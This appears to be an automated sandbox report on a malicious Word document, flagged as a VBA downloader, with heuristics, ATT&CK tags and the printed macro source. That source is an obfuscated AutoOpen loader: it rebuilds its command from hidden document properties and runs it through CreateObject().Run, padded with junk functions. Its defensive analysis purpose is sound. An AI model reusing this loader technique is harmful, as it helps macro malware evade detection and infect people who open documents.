MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The sample is a malicious Office document containing obfuscated VBA macros, specifically an AutoOpen macro that uses CreateObject and execution tokens. ClamAV identifies it as a VBSDownloader, indicating its purpose is to download and execute a secondary payload. The obfuscation and use of CreateObject suggest an attempt to evade detection and execute arbitrary code.
Heuristics 9
-
ClamAV: Doc.Macro.VBSDownloader-6336817-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.VBSDownloader-6336817-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
eZKbUPWwhYm = MydfuSCwS + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + FFveabse + VcfwcreSGEU + HCTancaku + VXDxZShPy + VaTAnTv + fysTZArX + gMSsPwg + CGLRpMFKh + nsLyNnPeWW CreateObject(mPbmCNZeYSe).Run$ eZKbUPWwhYm + FFveabse + VcfwcreSGEU + HCTancaku + VXDxZShPy + VaTAnTv + fysTZArX + gMSsPwg + CGLRpMFKh + hkvdTsszN, 0 KaLfKnmTv = EDYPxUteHLe + WpKKRtsc = VPDWEsWy -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
eZKbUPWwhYm = MydfuSCwS + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + FFveabse + VcfwcreSGEU + HCTancaku + VXDxZShPy + VaTAnTv + fysTZArX + gMSsPwg + CGLRpMFKh + nsLyNnPeWW CreateObject(mPbmCNZeYSe).Run$ eZKbUPWwhYm + FFveabse + VcfwcreSGEU + HCTancaku + VXDxZShPy + VaTAnTv + fysTZArX + gMSsPwg + CGLRpMFKh + hkvdTsszN, 0 KaLfKnmTv = EDYPxUteHLe + WpKKRtsc = VPDWEsWy -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
End Function Sub autoopen() BcCAdkEmz -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6634 bytes |
SHA-256: ffd2cc2f548aca48f7ab8df117f1ceadc0a5f83a450b1164ed8552ee86594c8e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
98 of 129 identifiers look randomly generated (e.g. 'whMxhRZvtcD') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Module1"
Function PLkRWELtR()
KpPTTSAzp = 7028
Dim MhgpKutPkN(7028)
amwvemvauxZ = "FEytbRKB"
vgPUVPy = "ENHWwKcrgYc"
MhgpKutPkN(2865) = TzPvYrVba
MhgpKutPkN(4146) = hSwWdtKzPR
MhgpKutPkN(1038) = pRKmFMwyEkx
MhgpKutPkN(6893) = 9953 + 5633 + 3205 + 5813 / 607 / 407 / 9094 - 8911 - 9832 - 5860 + 3878 + 7628
MhgpKutPkN(4450) = kgDgXhVDfa
MhgpKutPkN(3452) = cUGXuMNPA
MhgpKutPkN(1730) = SDurXKS
MhgpKutPkN(1780) = kwwMkfM
MhgpKutPkN(5780) = 5388
MhgpKutPkN(2626) = 1868
MhgpKutPkN(908) = 1594
MhgpKutPkN(4640) = 297
MhgpKutPkN(6031) = gBdsNfLmdp
MhgpKutPkN(1694) = BurpdcDrehs
MhgpKutPkN(3810) = 6942 + 9581 + 4881 / 2989 / 4604 - 8268 + 3444
MhgpKutPkN(910) = 1276 + 3440 + 6432 + 4453 / 3112 - 1538 + 6573 + 3020 + 1723
MhgpKutPkN(1108) = 4600 + 5762 / 5583 / 7019 / 9280 - 1170 - 4998 - 2033 + 4209 + 991 + 3585
For KpPTTSAzp = 1236 To 1703
MhgpKutPkN(KpPTTSAzp) = KpPTTSAzp
Next
NmfyxebLh = MhgpKutPkN(5532) + MhgpKutPkN(6894) + MhgpKutPkN(4583) + MhgpKutPkN(4623) + MhgpKutPkN(2029) + MhgpKutPkN(7028)
vvkfUKVMnVk = MhgpKutPkN(4816) + MhgpKutPkN(1383) + MhgpKutPkN(173) + MhgpKutPkN(3684) + MhgpKutPkN(650) + MhgpKutPkN(1651) + MhgpKutPkN(7028)
tuZcTpz = MhgpKutPkN(7009) + MhgpKutPkN(6919) + MhgpKutPkN(2196) + MhgpKutPkN(3675) + MhgpKutPkN(7028)
End Function
Function WhPDWkM()
xbvULRn = 5238
Dim uxcKWkryu(5238)
TdLSNEeEp = "VCpRpSPk"
FwMNwGNPxfM = "kZWpCVuZBH"
ksLcvyvSr = "EVXaVkwNuU"
uxcKWkryu(5001) = cwLCCHTPXV
uxcKWkryu(2173) = gkmTPYNTP
uxcKWkryu(3425) = 2215 + 6100 + 7606 / 6143 / 1765 / 6093 - 4194 + 4543 + 3630 + 1016
uxcKWkryu(3511) = 3247 + 7954 / 2857 - 2348 - 8186 - 2015 + 8094 + 4210
uxcKWkryu(4422) = 5893 + 4735 / 9993 / 8423 - 8213 - 9972 - 6893 + 9295 + 6793
uxcKWkryu(1742) = kRzygcV
uxcKWkryu(4312) = MHFPBuYLv
uxcKWkryu(2529) = ukmEdRs
uxcKWkryu(3956) = 3706
uxcKWkryu(3252) = SLRhHPVuBkc
uxcKWkryu(4665) = mrLutCdxUyd
uxcKWkryu(643) = 5888 + 1573 + 3767 / 6394 / 4418 / 4981 - 3042 - 3895 + 4468
uxcKWkryu(2639) = 4489 + 8607 + 5529 + 2720 / 335 / 3790 / 2804 - 1661 - 6751 + 437
For xbvULRn = 4850 To 3747
uxcKWkryu(xbvULRn) = xbvULRn
Next
FeUgaDBHr = uxcKWkryu(4619) + uxcKWkryu(2898) + uxcKWkryu(3141) + uxcKWkryu(3142) + uxcKWkryu(301) + uxcKWkryu(4719) + uxcKWkryu(1510) + uxcKWkryu(5238)
vGFzbEMPz = uxcKWkryu(4596) + uxcKWkryu(1907) + uxcKWkryu(2185) + uxcKWkryu(2185) + uxcKWkryu(5070) + uxcKWkryu(2222) + uxcKWkryu(5238)
WwaMrHnw = uxcKWkryu(741) + uxcKWkryu(4970) + uxcKWkryu(4225) + uxcKWkryu(4448) + uxcKWkryu(4953) + uxcKWkryu(5091) + uxcKWkryu(5238)
End Function
Sub autoopen()
BcCAdkEmz
End Sub
Public Function bPYCzetMyz(bNXDkMDgLrt)
KaLfKnmTv = EDYPxUteHLe + WpKKRtsc = VPDWEsWy
SAXyzzDzL = HPrBfFXB + MEyYwhvBSpy = wHgfpEh
LCagPtxAc = YLHDEfm + HPTBrTKLu = LzZpCaRYD
GgFYnkuEh = cKGDYRU + tBEPRXdeu = NskrBgptk
YykCMff = ActiveDocument.CustomDocumentProperties(bNXDkMDgLrt)
bPYCzetMyz = YykCMff
KaLfKnmTv = EDYPxUteHLe + WpKKRtsc = VPDWEsWy
SAXyzzDzL = HPrBfFXB + MEyYwhvBSpy = wHgfpEh
LCagPtxAc = YLHDEfm + HPTBrTKLu = LzZpCaRYD
GgFYnkuEh = cKGDYRU + tBEPRXdeu = NskrBgptk
End Function
Public Function BcCAdkEmz()
KaLfKnmTv = EDYPxUteHLe + WpKKRtsc = VPDWEsWy
SAXyzzDzL = HPrBfFXB + MEyYwhvBSpy = wHgfpEh
LCagPtxAc = YLHDEfm + HPTBrTKLu = LzZpCaRYD
GgFYnkuEh = cKGDYRU + tBEPRXdeu = NskrBgptk
mPbmCNZeYSe = bPYCzetMyz("yVbtGRByCEz") + bPYCzetMyz("WCFGhxbUvN") + FFveabse + VcfwcreSGEU + HCTancaku + VXDxZShPy + VaTAnTv + fysTZArX + gMSsPwg + CGLRpMFKh + bPYCzetMyz("ZfLztWWpgn") + bPYCzetMyz("HnFapFwUGZ") + bPYCzetMyz("WmDuayspUr")
KaLfKnmTv = EDYPxUteHLe + WpKKRtsc = VPDWEsWy
SAXyzzDzL = HPrBfFXB + MEyYwhvBSpy = wHgfpEh
LCagPtxAc = YLHDEfm + HPTBrTKLu = LzZpCaRYD
GgFYnkuEh = cKGDYRU + tBEPRXdeu = NskrBgptk
MydfuSCwS = bPYCzetMyz("pzUFheCWy") + bPYCzetMyz("YaRvZCykab") + bPYCzetMyz("YMRbVEWGRXk") + bPYCzetMyz("tyWntzdpCuH") + bPYCzetMyz("rcYtNCxTrt") + FFveabse + VcfwcreSGEU + HCTancaku + VXDxZShPy + VaTAnTv + fysTZArX + gMSsPwg + CGLRpMFKh + bPYCzetMyz("ZvBrbCxtFA")
eZKbUPWwhYm = MydfuSCwS + "" + ActiveDocument.BuiltInDocumentProperties("Comments") + FFveabse + VcfwcreSGEU + HCTancaku + VXDxZShPy + VaTAnTv + fysTZArX + gMSsPwg + CGLRpMFKh + nsLyNnPeWW
CreateObject(mPbmCNZeYSe).Run$ eZKbUPWwhYm + FFveabse + VcfwcreSGEU + HCTancaku + VXDxZShPy + VaTAnTv + fysTZArX + gMSsPwg + CGLRpMFKh + hkvdTsszN, 0
KaLfKnmTv = EDYPxUteHLe + WpKKRtsc = VPDWEsWy
SAXyzzDzL = HPrBfFXB + MEyYwhvBSpy = wHgfpEh
LCagPtxAc = YLHDEfm + HPTBrTKLu = LzZpCaRYD
GgFYnkuEh = cKGDYRU + tBEPRXdeu = NskrBgptk
End Function
Function DrsPazDuZR()
eGreNgPsrm = 5495
Dim SGGfUzXB(5495)
GDTkSFkB = ("dmbCuhfXXTy")
pbpDzevCcXM = ("yAZwVwGs")
SGGfUzXB(823) = DTnrffeZAbp
SGGfUzXB(5083) = AScvhDdRC
SGGfUzXB(3737) = xNmRbrM
SGGfUzXB(188) = 302 + 3998 / 2341 / 8526 - 2553 - 847 + 2038
SGGfUzXB(1883) = 99 + 2376 + 7825 / 321 / 7366 - 9172 - 2277 + 1370 + 1352 + 4944
SGGfUzXB(3521) = 3102 + 4546 + 4412 / 4436 / 8266 - 7087 - 3169 - 894 + 6411 + 8882
SGGfUzXB(1734) = VSKrCgDLx
SGGfUzXB(2028) = 2777
SGGfUzXB(4703) = 2836
SGGfUzXB(5396) = 8448
SGGfUzXB(451) = yeCBMPWUSF
SGGfUzXB(1740) = BgRLhgxrB
SGGfUzXB(2886) = CDBxbwmYFBc
SGGfUzXB(1976) = axNCdxP
SGGfUzXB(959) = 3687 + 8010 / 6516 / 6568 / 4877 - 496 - 6745 - 3967 + 9583 + 6229 + 3674
For eGreNgPsrm = 1145 To 2676
SGGfUzXB(eGreNgPsrm) = eGreNgPsrm
Next
whMxhRZvtcD = SGGfUzXB(1124) + SGGfUzXB(197) + SGGfUzXB(5495)
kYCuwfYm = SGGfUzXB(5325) + SGGfUzXB(5495)
BDLmxrDHZ = SGGfUzXB(977) + SGGfUzXB(3468) + SGGfUzXB(4273) + SGGfUzXB(4210) + SGGfUzXB(1868) + SGGfUzXB(1138) + SGGfUzXB(5495)
End Function
Function BUCpnXUM()
eCRFxSXAs = 8429
Dim tntfREKb(8429)
BmrdaZGex = ("nkpNuhFP")
tntfREKb(1901) = hwURRVbh
tntfREKb(4719) = 8208 + 879 + 9517 / 2412 / 3706 / 4079 - 5700 - 2188 - 1797 + 9673 + 1059 + 5879
tntfREKb(4221) = eGbPYZsG
tntfREKb(6971) = 6135
tntfREKb(1058) = ccGgZhetzY
tntfREKb(2647) = 3319 + 785 / 7265 - 4700 - 2022 + 9789 + 9186
tntfREKb(1600) = 1265 + 5269 / 2242 - 8105 - 9347 + 5755 + 9945
tntfREKb(2268) = 1740 + 9975 + 3319 / 5537 / 1326 - 9982 - 3238 + 729 + 2866 + 7308
For eCRFxSXAs = 2931 To 5355
tntfREKb(eCRFxSXAs) = eCRFxSXAs
Next
TgBBLERP = tntfREKb(3861) + tntfREKb(8429)
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.